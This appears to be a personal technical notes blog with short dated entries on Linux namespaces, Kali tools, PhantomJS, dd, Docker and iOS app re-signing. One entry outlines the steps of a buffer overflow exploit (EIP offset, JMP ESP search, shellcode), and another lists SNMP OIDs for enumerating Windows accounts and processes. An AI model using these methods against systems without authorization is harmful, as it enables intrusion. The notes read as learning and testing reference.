Tuesday, June 18, 2019

Namespace of processes


Check namespace ID of process.  Can quickly determine if uts namespace collide

$ls -lash /proc/self/ns  
total 0
0 dr-x--x--x. 2  0 Jun 19 01:11 .
0 dr-xr-xr-x. 9  0 Jun 19 01:11 ..
0 lrwxrwxrwx. 1  0 Jun 19 01:11 cgroup -> 'cgroup:[4026531835]'
0 lrwxrwxrwx. 1  0 Jun 19 01:11 ipc -> 'ipc:[4026531839]'
0 lrwxrwxrwx. 1  0 Jun 19 01:11 mnt -> 'mnt:[4026531840]'
0 lrwxrwxrwx. 1  0 Jun 19 01:11 net -> 'net:[4026531992]'
0 lrwxrwxrwx. 1  0 Jun 19 01:11 pid -> 'pid:[4026531836]'
0 lrwxrwxrwx. 1  0 Jun 19 01:11 pid_for_children -> 'pid:[4026531836]'
0 lrwxrwxrwx. 1  0 Jun 19 01:11 user -> 'user:[4026531837]'

0 lrwxrwxrwx. 1  0 Jun 19 01:11 uts -> 'uts:[4026531838]'

pidof [prog]
ls -lash /proc/[pid]/ns

Friday, November 6, 2015

thc-hydra

[VERBOSE] Could not create an SSL session: error:14077102:SSL routines:SSL23_GET_SERVER_HELLO:unsupported protocol

The default hydra-thc install on Kali at the time of this post, is not compiled to support SSL.  Download thc-hydra from source and compile to get it working.

Thursday, October 29, 2015

Kali - peepingtom + capture.js + phantomjs problems

At the time of this post, I experienced the following problems getting peepingtom and phantom.js up and running:

Step 1:
Compile phantom.js from source.  If you are experiencing problems with the ./build.sh script complaining of out of memory problems, increase your swap space.  Follow the directions on this blog here:

https://www.digitalocean.com/community/tutorials/how-to-add-swap-on-ubuntu-14-04


Step 2.
Copy the built binary into /usr/bin/phantomjs

Step 3.
Modify capture.js file to the following:


var page = require('webpage').create(),
    url, filename, size;

var args = require('system').args;
url = args[1]
filename = args[2]
// url = phantom.args[0];
// filename = phantom.args[1];
page.viewportSize = { width: 800, height: 600 };
page.clipRect = { top: 0, left: 0, width: 800, height: 600 };
page.open(url, function (status) {
    //if (status !== 'success') {
    //    console.log('Unable to load the address!');
    //} else {
        window.setTimeout(function () {
            page.render(filename);
            phantom.exit();
        }, 200);
    //}
});

Wednesday, July 22, 2015

Windows Infections without tools

http://909research.com/find-a-windows-infection-quickly-without-tools/

Tuesday, July 21, 2015

VirtualBox Ubuntu stuck on 640x480

sudo apt-get install virtualbox-guest-dkms

dd

sudo dd if=/dev/sdc conv=sync,noerror of=/home/backup.img bs=64K

You will also need to use those options for the restore:


sudo dd if=/home/backup.img of=/dev/sdb conv=sync,noerror bs=64K

Wednesday, July 8, 2015

Start another shell session on same container in Docker

docker exec -it "id of running container" bash

Thursday, July 2, 2015

Interactive Regex tester

https://regex101.com/#python

OSX FW Config

https://discussions.apple.com/thread/6645172

Refresher buffer overflow

1.  Fuzz 
2.  Load immunity debugger
3.  Overwrite EIP register
4.  Use /usr/share/metasploit-framework/tools/pattern_create.rb [length]
5.  Find value crashed in EIP register.
6.  Use /usr/share/metasploit-framework/tools/pattern_offset.rb [value] of the crashed value in the EIP register.
7.  Use this as the new base length for the crash.
8.  Find out if there are any restricted characters for payload in shell code.
9.  !mona modules in immunity debugger.  So we can find the loaded libraries.  Find one that does not have protection ( ASLR , the range of memory does not include null bytes)
10. Search for jmp esp register to use:
10.a  Use /usr/share/metasploit-framework/tools/nasm_shell.rb to search for the opcode equivalent of jump esp
nasm > jmp esp 
00000000 FFE4      jmp esp

11.  Search for this op code in mona again:  !mona find -s “\xff\xe4” -m slmfc.dll

12.  Select one that does not have bad addresses, double check the contents at this address by double clicking.  
13.  Replace your EIP address that will be modified during the overflow with this jmp esp register value.
14.  To validate, set a breakpoint at the address of the jmp esp register.  Run the exploit again to make sure that the address has been hit.

15.  Add shell code so that jsp will now run the shell code

Tuesday, June 23, 2015

Common Microsoft Windows SNMP parameters



1.3.6.1.2.1.25.1.6.0
System Processes
1.3.6.1.2.1.25.4.2.1.2
Running Programs
1.3.6.1.2.1.25.4.2.1.4
Processes Path
1.3.6.1.2.1.25.2.3.1.4
Storage Units
1.3.6.1.2.1.25.6.3.1.2
Software Name
1.3.6.1.4.1.77.1.2.25
User Accounts
1.3.6.1.2.1.6.13.1.3
TCP Local Ports

Monday, September 22, 2014

Manual install of apps on iPhone 6 simulator

Source:
https://forums.adobe.com/thread/1571152

Well, I'll describe what I did, but I don't know why exactly it works like this, nor can I guarantee it will work for you 
1. Install a native app on the simulator of choice (e.g. iPhone 6+) with Xcode 6.
2. Build the an ipa file for the simulator with Flash (this crashes Flash for me, but it builds the ipa before crashing), and unzip it so you can access the .app file in it.
3. Locate the directory of the simulator you want to use. In ~/Library/Developer/CoreSimulator/Devices you will find several folders (with names that look like hexadecimal), each with a simulator. Check the device.plist file in each to find the simulator you want. The one for iPhone 6+ contains the string "com.apple.CoreSimulator.SimDeviceType.iPhone-6-Plus".
4. In that folder, go to data/Containers/Bundle/Application, where you should see another folder with a hexadecimal name, containing the .app file of the native app installed in step 1.
5. Next to that folder, create a new folder for your app. I named that folder after the app bundle ID. Copy your .app file from step 2 into that new folder.
6. In the folder of the native app (step 4), open the hidden file named .com.apple.mobile_container_manager.metadata.plist and change the string under MCMMetadataIdentifier into your app's bundle ID. I didn't change the other stuff in there as I don't know what it means. Save this changed file into the newly created folder next to your .app file.
7. Open the simulator (located at /Applications/Xcode.app/Contents/Applications) and in it the chosen device in the hardware menu. On the 2nd page you should hopefully see your app icon. If not, then it means that one of the many other things I tinkered with had an effect as well...

Thursday, July 17, 2014

Passing parameters to javascript action methods

http://stackoverflow.com/questions/8442552/passing-parameters-to-a-jquery-function-from-a-button-click


Wednesday, July 9, 2014

Re-codesign iPhone apps (.ipa files) with Enterprise Certificates

http://avinashdongarwar.blogspot.com/2013/12/re-codesign-iphone-apps-ipa-files-with.html

Pre-Requisites

1)   Download the distribution certificate from iOS Developer Enterprise Program account. Include it in keychain by double clicking on downloaded .cer file. 
2)   Download the provisioning profile for the app that needs to be resigned from  iOS Developer Enterprise Program Account.
3)   Have the .ipa file of the app that needs to be resigned.

How to Re-sign -
 Lets say Application.ipa is the one we are re-signing.
Open terminal  and -
1)  Unzip the .ipa file.
unzip Application.ipa 
2)  At this stage, you will be having a directory named “Payload” in your working directory with a file with .app extension inside.  In this case it will be Application.app.
3)  In case you want to check the signing authority of the app -
 codesign -dvv Payload/Application.app
4)  Remove old code signature.
rm -r "Payload/Application.app/_CodeSignature" "Payload/Application.app/CodeResources" 2> /dev/null | true
5)   In case Bundle identifier used for registering the application while creating provisioning profile through Enterprise account differs from what was used while signing the app for the first time, we need to change Bundle               identifier using Plistbuddy.
/usr/libexec/PlistBuddy Payload/Apps.app/Info.plist
Use following commands -
a)  Set :CFBundleIdentifier
b)  Save
c)  Quit
6)  In case app uses OS capabilities like Shared keychain, SSO, push notifications etc. we need to add an entitlements property list while resigning in order to enable App Sandbox for the application. For example:
. A new entilements file can be created using –
     /usr/bin/codesign -d --entitlements :entitlements.plist Payload/Application.app
7)  Open the entitlements.plist and edit it.
a) vi entitlements.plist
b) Press i.
c) Entilements.plist looks like -
UTF-8
"?>
http://www.apple.com/DTDs/PropertyList-1.0.dtd
">
        application-identifier
        XXXXXXXX.
        get-task-allow
       
        keychain-access-groups
       
                XXXXXXXX.
                XXXXXXXX.< keychain group id>
                …………..etc………..
       

In the above chunk, XXXXXXXX part has to be replaced with team ID of the Enterprise Account.
d)  Press esc
e)  :wq!
8) Replace embedded provisioning profile.
cp "" "Payload/Apps.app/embedded.mobileprovision"
9) Re-sign








 /usr/bin/codesign -f -s "" --resource-rules "Payload/Application.app/ResourceRules.plist" --entitlements entitlements.plist "Payload/Application.app"
Certificate Authorities can be even checked in "Keychain Access" Utility application on MAC systems. Open "Keychain Access"  and search with keyword "iPhone Distribution".
  
10) Repackage
    zip -qr "Application.resigned.ipa" Payload

Wednesday, July 2, 2014

Resigning an application

http://avinashdongarwar.blogspot.com/2013/12/re-codesign-iphone-apps-ipa-files-with.html

Friday, June 6, 2014

Crashing avd emulator

http://timvoet.com/2013/01/04/avd-emulator-crashes-on-mac/

Wednesday, April 23, 2014

Enable syslog server on Mavericks

http://stackoverflow.com/questions/5510563/how-to-start-syslogd-server-on-mac-to-accept-remote-logging-messages

Tuesday, April 22, 2014

Installing geoip to mavericks

http://www.krishnasunuwar.com.np/2014/02/installation-maxmind-geoip-python-library-in-os-x-10-9-mavericks/

Steps to installing GeoIP for django

1.  Install C Library
2.  Download binary database and put it in share folder
3. Download python library GeoIP 1.3.1 (pip install geoip)
4.  Configure Django settings.py
    'django.contrib.gis',